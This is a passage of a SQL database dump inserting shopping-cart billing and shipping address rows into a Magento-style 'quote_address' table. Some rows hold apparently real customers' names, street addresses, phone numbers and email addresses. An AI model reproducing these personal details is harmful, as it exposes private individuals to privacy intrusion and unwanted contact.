(657, 510, '2025-12-18 00:56:10', '2025-12-18 00:56:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(658, 510, '2025-12-18 00:56:10', '2025-12-18 00:56:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(659, 511, '2025-12-26 22:20:28', '2025-12-26 22:20:28', NULL, 0, NULL, 'billing', NULL, NULL, 'Virginia', NULL, 'L', NULL, 'Virginia', '2 Newberry Lane', 'Pinehurst', 'North Carolina', 44, '28374', 'US', '5407608684', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(660, 511, '2025-12-26 22:20:28', '2025-12-26 22:20:35', NULL, 0, NULL, 'shipping', NULL, NULL, 'Virginia', NULL, 'L', NULL, 'Virginia', '2 Newberry Lane', 'Pinehurst', 'North Carolina', 44, '28374', 'US', '5407608684', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(661, 513, '2026-01-02 12:25:07', '2026-01-02 12:25:07', NULL, 0, NULL, 'billing', NULL, NULL, 'Connie', NULL, 'M', NULL, 'Connie', '11928 Gold Creek Drive', 'Keller', 'Texas', 57, '76244', 'US', '8473729625', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(662, 513, '2026-01-02 12:25:07', '2026-01-02 12:25:14', NULL, 0, NULL, 'shipping', NULL, NULL, 'Connie', NULL, 'M', NULL, 'Connie', '11928 Gold Creek Drive', 'Keller', 'Texas', 57, '76244', 'US', '8473729625', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(663, 514, '2026-01-02 23:16:00', '2026-01-02 23:16:00', NULL, 0, NULL, 'billing', NULL, NULL, 'Paul', NULL, 'McNeill', NULL, 'Paul', '1130 Nash Loop', 'The Villages', 'Florida', 18, '32162', 'US', '3522055256', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(664, 514, '2026-01-02 23:16:00', '2026-01-02 23:16:05', NULL, 0, NULL, 'shipping', NULL, NULL, 'Paul', NULL, 'McNeill', NULL, 'Paul', '1130 Nash Loop', 'The Villages', 'Florida', 18, '32162', 'US', '3522055256', NULL, 0, 0, 'tablerate_bestway', 'Best Way - Table Rate', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(665, 515, '2026-01-03 11:04:16', '2026-01-03 11:04:16', 118, 0, NULL, 'billing', 'xadeyaja181@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(666, 515, '2026-01-03 11:04:16', '2026-01-03 11:04:16', 118, 0, NULL, 'shipping', 'xadeyaja181@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(667, 516, '2026-01-03 11:04:19', '2026-01-03 11:04:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(668, 517, '2026-01-07 23:06:36', '2026-01-07 23:06:36', 119, 0, NULL, 'billing', 'ib.ih.as.eq.aj.e.0.6.7@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(669, 517, '2026-01-07 23:06:36', '2026-01-07 23:06:36', 119, 0, NULL, 'shipping', 'ib.ih.as.eq.aj.e.0.6.7@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(670, 518, '2026-01-08 10:42:37', '2026-01-08 10:42:37', 120, 0, NULL, 'billing', 'fi.yi.v.e.cu.65@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(671, 518, '2026-01-08 10:42:37', '2026-01-08 10:42:37', 120, 0, NULL, 'shipping', 'fi.yi.v.e.cu.65@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(672, 519, '2026-01-11 16:07:10', '2026-01-11 16:07:10', 121, 0, NULL, 'billing', 'iqe.c.i.ya.li.k.o80.6@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(673, 519, '2026-01-11 16:07:10', '2026-01-11 16:07:10', 121, 0, NULL, 'shipping', 'iqe.c.i.ya.li.k.o80.6@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(674, 520, '2026-01-13 15:18:25', '2026-01-13 15:18:25', 122, 0, NULL, 'billing', 'op.oy.im.o.baxe.h86@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(675, 520, '2026-01-13 15:18:25', '2026-01-13 15:18:25', 122, 0, NULL, 'shipping', 'op.oy.im.o.baxe.h86@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(676, 521, '2026-01-13 20:10:29', '2026-01-13 20:10:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(677, 521, '2026-01-13 20:10:29', '2026-01-13 20:10:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 4.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(678, 522, '2026-01-18 02:14:23', '2026-01-18 02:14:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(679, 522, '2026-01-18 02:14:23', '2026-01-18 02:14:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(680, 523, '2026-01-21 21:30:23', '2026-01-21 21:30:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(681, 523, '2026-01-21 21:30:23', '2026-01-21 21:30:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(682, 524, '2026-01-21 21:36:14', '2026-01-21 21:36:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(683, 524, '2026-01-21 21:36:14', '2026-01-21 21:36:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 643.0000, 643.0000, 514.4000, 514.4000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -128.6000, -128.6000, 514.4000, 514.4000, NULL, '[]', NULL, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(684, 525, '2026-01-21 22:35:36', '2026-01-21 22:35:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(685, 525, '2026-01-21 22:35:36', '2026-01-21 22:35:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(686, 526, '2026-01-24 20:20:36', '2026-01-24 20:20:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(687, 526, '2026-01-24 20:20:36', '2026-01-24 20:20:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(688, 527, '2026-01-24 20:35:09', '2026-01-24 20:35:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(689, 527, '2026-01-24 20:35:09', '2026-01-24 20:35:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(690, 528, '2026-01-27 09:33:47', '2026-01-27 09:33:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(691, 528, '2026-01-27 09:33:47', '2026-01-27 09:33:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(692, 529, '2026-01-27 09:34:15', '2026-01-27 09:34:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(693, 529, '2026-01-27 09:34:15', '2026-01-27 09:34:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(694, 530, '2026-01-28 07:19:58', '2026-01-28 07:19:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(695, 530, '2026-01-28 07:19:58', '2026-01-28 07:19:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(696, 531, '2026-01-28 07:20:25', '2026-01-28 07:20:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(697, 531, '2026-01-28 07:20:25', '2026-01-28 07:20:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(698, 532, '2026-01-29 09:40:43', '2026-01-29 09:40:43', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(699, 532, '2026-01-29 09:40:43', '2026-01-29 09:40:43', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(700, 533, '2026-01-29 09:41:08', '2026-01-29 09:41:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
